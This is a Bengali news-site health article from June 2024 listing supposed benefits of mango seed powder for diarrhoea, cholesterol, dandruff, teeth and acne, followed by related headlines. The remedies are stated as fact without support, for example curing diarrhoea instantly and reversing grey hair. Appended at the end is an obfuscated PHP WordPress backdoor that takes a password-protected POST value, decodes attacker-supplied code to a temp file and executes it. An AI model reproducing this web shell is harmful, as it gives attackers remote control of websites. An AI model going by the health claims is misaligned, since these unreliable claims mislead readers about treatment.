শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

জেনে নিন আমের আঁটির বিস্ময়কর যত স্বাস্থ্যগুণ

Amস্বাস্থ্য ডেস্ক : প্রায় প্রতিদিনই আম, আমের লাচ্ছি অথবা আমের রস খাওয়া হচ্ছে। আম পছন্দ করে না এমন মানুষ খুঁজে মেলা ভার। আম খাওয়ার পর এর আঁটিটি কী করেন? ফেলে দিন নিশ্চয়। কিন্তু আপনি কি জানেন ফেলা দেওয়া এই আমের আঁটিটিতে লুকিয়ে আছে অনেকগুলো স্বাস্থ্য সমস্যার সমাধান! কি অবাক হচ্ছেন? তাহলে চলুন জেনে নিই আমের আঁটির যত স্বাস্থ্যগুণ-

১। ডায়ারিয়া প্রতিরোধেঃ-
আমের আঁটির গুঁড়ো দিনে ২-৩ বার খান, এটি ডায়ারিয়া প্রতিরোধে সাহায্য করবে। এছাড়া ১-২ গ্রাম আমের আঁটির গুঁড়োর সাথে মধু মিশিয়ে খান, এটি ডায়ারিয়া দূর করে দেবে নিমিষে।

২। কোলেস্টেরল প্রতিরোধেঃ-
আমের আঁটি রক্ত চলাচল সচল রেখে রক্তের খারাপ কোলেস্টেরল দূর করে থাকে। এটি রক্তে চিনির মাত্রা এবং প্রোটিন লেভেল নিয়ন্ত্রণ রাখতে সাহায্য করে।

৩। খুশকি দূর করতেঃ-
আমের আঁটি খুশকির যন্ত্রণা থেকে মুক্তি দিবে। আমের আঁটির গুঁড়ো করে এটি সরিষা তেলের সাথে মিশিয়ে নিন। এটি সূর্যের আলোতে কিছুদিন রাখুন। তারপর এটি মাথার তালুতে ভাল করে লাগিয়ে নিন। কয়েক ঘণ্টার পর চুল ধুয়ে ফেলুন। এটি খুশকির সমস্যা দূর করার সাথে সাথে চুল পড়া এবং চুল পাকা সমস্যারও সমাধান করে দেবে।

৪। দাঁত সাদা করতেঃ-
আমের আঁঠির গুঁড়ো খুব ভাল টুথ পাউডার হিসেবে কাজ করে। টুথ ব্রাশে আমের আঁটির গুঁড়ো লাগিয়ে দাঁত ব্রাশ করুন। এটি দাঁত সাদা করার পাশপাশি দাঁত এবং মাড়ি মজবুত করবে।

৫। ব্রণ দূর করতেঃ-
আমের আঁটির গুঁড়োর সাথে টমেটোর পেস্ট মিশিয়ে নিন। এটি ত্বকে স্ক্রাবের মত ব্যবহার করুন। এটি ত্বক এক্সফলিয়েট করে, ব্ল্যাক হেডেস, ব্রণ দূর করে দেয়। এটি আপনি প্রতিদিন ব্যবহার করতে পারেন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}